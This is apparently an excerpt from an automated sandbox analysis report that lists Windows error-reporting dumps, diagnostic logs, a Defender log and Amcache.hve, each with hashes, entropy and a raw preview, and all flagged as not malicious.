                        Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER442A.tmp.csv
                        Process:C:\Windows\System32\svchost.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):50736
                        Entropy (8bit):3.067413848116051
                        Encrypted:false
                        SSDEEP:768:mlHP0PBtEtb8nvcbqq0Mpf2jsIj6fL5a8JFQlRrX6pBB:mlHP0kmvnq0Mpf2jsIj6fVfJFQlRrXg
                        MD5:803E6C65E05E444CC6D1234CF13CF698
                        SHA1:201646938AD21499C4446FD4159ACEB037755D36
                        SHA-256:0341B3AFAB60971EFE6B68E35AF935FBAD56E6839CCE467968A460E614D030EC
                        SHA-512:B7BE0875BF25E891CAE62FB082D0C3C37FC68A35423E1AB05F19E42F4D0B1A0CCF95A089A47678614F293525CE4174555DA93DC6127EABCABC5E790C61DEB3D5
                        Malicious:false
                        Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER47E4.tmp.txt
                        Process:C:\Windows\System32\svchost.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):13340
                        Entropy (8bit):2.6958812411265396
                        Encrypted:false
                        SSDEEP:96:9GiZYWocWRksgYjYdWG0HdUYEZWdtBiMOikPwBxOaOiulooVI2D3:9jZDoctEjtIaOiulooq2D3
                        MD5:BCC0FBB5EA3D4F459A785BF7D40D04CF
                        SHA1:0AEDC449D95C2419CCD888AD1DA3693A7139C327
                        SHA-256:7C03C8D4FD2D8B2A001292421BDF8921526A7ABD2C0A5E271F4B1D2E84F0AB60
                        SHA-512:7365B1E98BF06F0AEA990ACCD4AD84518A6CFC42DB908FE346CD5FC7C250A1558B0979C47CA47F05CED96CDA52E0B366D68BACB70A1472B49E1340F315E7B398
                        Malicious:false
                        Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERCFCE.tmp.dmp
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Mini DuMP crash report, 15 streams, Thu Dec 2 08:45:33 2021, 0x1205a4 type
                        Category:dropped
                        Size (bytes):27124
                        Entropy (8bit):2.5227497585999266
                        Encrypted:false
                        SSDEEP:192:vn98xfZSOGRoR6ETXD19JBFdL66e5zB9/jm2Qc7NO:OZZtvR3bkhB9/jm2I
                        MD5:E5141806E722AB8D685803190E529910
                        SHA1:E7375311A45E87F4545F3A1FED9321BA37A5667C
                        SHA-256:CE0B8E9F3A2E2F8E894245630FD8FD6971ACD011578E02B7DE25AE66A2568595
                        SHA-512:32113A36B37B843C9D791E873C6675725DD94371F8F2B3A45A6EC04083C75E0B010BB67AA259C9AEDEABACF498B29BF5B517683B97DCFE7FE7E9C125DDB32F96
                        Malicious:false
                        Preview: MDMP....... ..........a............4...............H.......$...........................`.......8...........T...........h....]...........................................................................................U...........B......p.......GenuineIntelW...........T..............a*............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERDDA9.tmp.WERInternalMetadata.xml
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):8342
                        Entropy (8bit):3.6988259840759303
                        Encrypted:false
                        SSDEEP:192:Rrl7r3GLNi4D26D6YFwSUVegmfsSz1CpBD89b8isfnNUm:RrlsNi96D6YySUVegmfsSzL8hf7
                        MD5:42DAD3491F32B2156FE774868DCBB554
                        SHA1:0C2893932753C19EEBAE582C44714506F1BD2D6F
                        SHA-256:DCB65F16F4D0337855B5F95382D6AB207DB90474BE09EEAD95F10951A9BD9E37
                        SHA-512:9929CB1E5BB76D9BCB6F963151702123B401815774C66EFD9F381C2846B73C75405BE264B42E6C9314D5B79C8FB8DE5793CD6835270484E2C9DA6B7B592CAD27
                        Malicious:false
                        Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.0.4.<./.P.i.d.>.......
                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERE06A.tmp.xml
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):4598
                        Entropy (8bit):4.472927288004771
                        Encrypted:false
                        SSDEEP:48:cvIwSD8zspJgtWI9PfWSC8B5/8fm8M4J2yzZFz+q84WvRtKcQIcQwQud:uITf7QOSNTkJJXgRtKkwQud
                        MD5:26B590A331A6F8FD1749A5322B474168
                        SHA1:1DE890E6BD761F52BF77BCCF60C4ACCD5E57ECAD
                        SHA-256:6C3DACC0416F1B7F815490F2722B56017C93613967CE07E56371FF35329907B0
                        SHA-512:16685B796C45267A7871E7582681EA078EF278236970923E153CADA1A972AAF1B7D346D4752D3E4A8420A33E389520F5637FFBE45F8360D1F804F32F57CD60A3
                        Malicious:false
                        Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1279796" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERF6ED.tmp.dmp
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Mini DuMP crash report, 15 streams, Thu Dec 2 08:45:40 2021, 0x1205a4 type
                        Category:dropped
                        Size (bytes):1060200
                        Entropy (8bit):1.459332588866509
                        Encrypted:false
                        SSDEEP:6144:gD0HYoO64LlrQxLx6OkjgUL+XOOk1PUG+7:gD0HYoO6q2G0
                        MD5:B6BCA9CF0542358C956D652400C7FF18
                        SHA1:5EFB1A9C3D6F8CA85FCE38945B9C352537BF5DCD
                        SHA-256:01112605F92FD92E2EB2C0507F67D12D15F3E6F48F1A7CD29EE469BBD91F1DD0
                        SHA-512:9D4EB1932918C38BB75AD67AD12CDF6120E0271BD019B90AF21454509F03264C13BB836C5188844EADE81CBCC3B6A9C4E4705853768568812E9AE00F10AC5CFA
                        Malicious:false
                        Preview: MDMP....... ..........a............4...............H.......$...........................`.......8...........T...........@...(!...........................................................................................U...........B......p.......GenuineIntelW...........T..............a*............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERFF1C.tmp.WERInternalMetadata.xml
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):8302
                        Entropy (8bit):3.690427159648357
                        Encrypted:false
                        SSDEEP:192:Rrl7r3GLNi4DI666YF6SU1e6JgmfL8GSmSCpDI89b9isfJfm:RrlsNiD666Y4SU1lgmfLrSI9hfs
                        MD5:BF673072D4F11B6CB75E987CFAA38AD1
                        SHA1:AA483DC23D4CA3D73D92E79156DC7C5A28698ECC
                        SHA-256:FF96A29393157F771AD0D81CCB63C48CF89339901200BF7DAEA162D1B6DF87F2
                        SHA-512:9B8D70A980B50950540E453D8E6571058D7CB79301B9FD1D6AEC14005EB8D5D60624542745B3B728907078476FA3DA58CA9375D53F555CB92B960BFEB22EA3CE
                        Malicious:false
                        Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.0.4.<./.P.i.d.>.......
                        C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl
                        Process:C:\Windows\System32\svchost.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.11021535299334234
                        Encrypted:false
                        SSDEEP:12:266TXm/Ey6q9995I+o4q3qQ10nMCldimE8eawHjcDP:26fl68G+ULyMCldzE9BHjcL
                        MD5:3D00C9DF8E5E1F47E6B20532AABBB4DA
                        SHA1:EE284E276B723832CF789E441C165C284CF3E6E9
                        SHA-256:25AD6701E1390B7B424DE6011D5ED110D51AEC075CBA958F70061D12CF1C823A
                        SHA-512:CE9ADC3D14389F35AA593B6C18C0A2455F3D46D888AEA3892389F4AA01E53F39345BD97A923342E0EC84915A539C23D23625CF379F22A5066939BACD3BC981A0
                        Malicious:false
                        Preview: .................................................................................................................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................#.Py...... ......0v.X...........S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.................................................................................................................................................................................................................................................................................................................................................................................................................
                        C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl
                        Process:C:\Windows\System32\svchost.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.11275543432803492
                        Encrypted:false
                        SSDEEP:12:uTXm/Ey6q9995I+Y1miM3qQ10nMCldimE8eawHza1miI1/S/:bl68G+Y1tMLyMCldzE9BHza1tI8
                        MD5:DB838E4E82C37BA9F6B3A3D8ABEE5F63
                        SHA1:0C552D167ECA1FE99CEC5DB5D1363B0F60AA8EEC
                        SHA-256:D6E53CA12E78C95452BA62A335CA5F3F693D51D041D07600A505CF8F55CDCF73
                        SHA-512:0F92FE4D916A88AEDBB07948FC3CABF806A652F9DC3F3C6C57213D036EDBDE7FE56A61EF407C95FE0E28B56F02DC03CEFFC0AE01882F18EE4F27E79530EFA1F7
                        Malicious:false
                        Preview: .........................................................................................}.......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................#.Py...... .......`.X...........U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P.........t.......................................................................................................................................................................................................................................................................................................................................................................................
                        C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl
                        Process:C:\Windows\System32\svchost.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.11262919192059402
                        Encrypted:false
                        SSDEEP:12:v7Xm/Ey6q9995I+Lh1mK2P3qQ10nMCldimE8eawHza1mKrf:6l68G+Lh1iPLyMCldzE9BHza1P
                        MD5:3E637E9236A071267C7F1E49DFC489FC
                        SHA1:2905C0C396334D9B37E2037309E0E5ED56AD7024
                        SHA-256:83523AB1EB55DB164B5CCB8EF4C9574BEE136A53397172C52D1F5BE8DB66CB21
                        SHA-512:79A74D7592AE36E3BF0F5DC314D6056A01A5F29238E3BD50945A879F8B35DC6B84963F1251BB3DC6A832D2AB7231CAA56BD601966F9DDAE74E38751113A258F7
                        Malicious:false
                        Preview: ........................................................................................0......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................#.Py...... .......Y.X...........U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P...............................................................................................................................................................................................................................................................................................................................................................................................
                        C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl.0001 (copy)
                        Process:C:\Windows\System32\svchost.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.11021535299334234
                        Encrypted:false
                        SSDEEP:12:266TXm/Ey6q9995I+o4q3qQ10nMCldimE8eawHjcDP:26fl68G+ULyMCldzE9BHjcL
                        MD5:3D00C9DF8E5E1F47E6B20532AABBB4DA
                        SHA1:EE284E276B723832CF789E441C165C284CF3E6E9
                        SHA-256:25AD6701E1390B7B424DE6011D5ED110D51AEC075CBA958F70061D12CF1C823A
                        SHA-512:CE9ADC3D14389F35AA593B6C18C0A2455F3D46D888AEA3892389F4AA01E53F39345BD97A923342E0EC84915A539C23D23625CF379F22A5066939BACD3BC981A0
                        Malicious:false
                        Preview: .................................................................................................................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................#.Py...... ......0v.X...........S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.................................................................................................................................................................................................................................................................................................................................................................................................................
                        C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl.0001 (copy)
                        Process:C:\Windows\System32\svchost.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.11275543432803492
                        Encrypted:false
                        SSDEEP:12:uTXm/Ey6q9995I+Y1miM3qQ10nMCldimE8eawHza1miI1/S/:bl68G+Y1tMLyMCldzE9BHza1tI8
                        MD5:DB838E4E82C37BA9F6B3A3D8ABEE5F63
                        SHA1:0C552D167ECA1FE99CEC5DB5D1363B0F60AA8EEC
                        SHA-256:D6E53CA12E78C95452BA62A335CA5F3F693D51D041D07600A505CF8F55CDCF73
                        SHA-512:0F92FE4D916A88AEDBB07948FC3CABF806A652F9DC3F3C6C57213D036EDBDE7FE56A61EF407C95FE0E28B56F02DC03CEFFC0AE01882F18EE4F27E79530EFA1F7
                        Malicious:false
                        Preview: .........................................................................................}.......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................#.Py...... .......`.X...........U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P.........t.......................................................................................................................................................................................................................................................................................................................................................................................
                        C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl.0001@Y (copy)
                        Process:C:\Windows\System32\svchost.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.11262919192059402
                        Encrypted:false
                        SSDEEP:12:v7Xm/Ey6q9995I+Lh1mK2P3qQ10nMCldimE8eawHza1mKrf:6l68G+Lh1iPLyMCldzE9BHza1P
                        MD5:3E637E9236A071267C7F1E49DFC489FC
                        SHA1:2905C0C396334D9B37E2037309E0E5ED56AD7024
                        SHA-256:83523AB1EB55DB164B5CCB8EF4C9574BEE136A53397172C52D1F5BE8DB66CB21
                        SHA-512:79A74D7592AE36E3BF0F5DC314D6056A01A5F29238E3BD50945A879F8B35DC6B84963F1251BB3DC6A832D2AB7231CAA56BD601966F9DDAE74E38751113A258F7
                        Malicious:false
                        Preview: ........................................................................................0......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................#.Py...... .......Y.X...........U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P...............................................................................................................................................................................................................................................................................................................................................................................................
                        C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log
                        Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                        File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                        Category:modified
                        Size (bytes):9062
                        Entropy (8bit):3.162514829896139
                        Encrypted:false
                        SSDEEP:192:cY+38+DJl+ibJ6+ioJJ+i3N+WtT+E9tD+Ett3d+E3z2+n:j+s+v+b+P+m+0+Q+q+N+n
                        MD5:45F724A01077F0B6AEE57CCEA1066184
                        SHA1:B48A7BF42762E10226AB294623D2096D16EE6D98
                        SHA-256:F6800E12FD9EEBFB859EECA2C2D1FBEF67B1B4A402D2984DACC1D78B870BE113
                        SHA-512:E149AED2BD14FAB717B9F6D83C9EC1BB50008CA22D4D7F42B8109C00E258A41D72C8FF85561F6B05AC0BF37CF8235F8D2CC54A9B65151CAF0E8C83E1CEC89FE6
                        Malicious:false
                        Preview: ..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.............-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
                        C:\Windows\appcompat\Programs\Amcache.hve
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:MS Windows registry file, NT/2000 or above
                        Category:dropped
                        Size (bytes):1572864
                        Entropy (8bit):4.273017175011374
                        Encrypted:false
                        SSDEEP:12288:GB/9SE+9261nnSxOWwOwtbEPwcAsFR3GEabPLXU+WFrL+2cd1IjXv:M/9SE+9261nnSxFv
                        MD5:FCC37D9D122D15FE34FC4DDDD05F6038
                        SHA1:956B97E5CC071B8010E900AFEEDFCF8A95C3E634
                        SHA-256:5C694AD7B63140825A8C4F3BBDD126DCDFD23AAEC2DBE5851A29D1D9C97CFBCA
                        SHA-512:A299CBAC259AEF6AC5BE4BC809B512645A8F825E7D36AF1B127DE6BF07A84BB814AED15ECC90A4C859742B588BC36E1C8888FC892E0B01A2889F24A4FB775010
                        Malicious:false
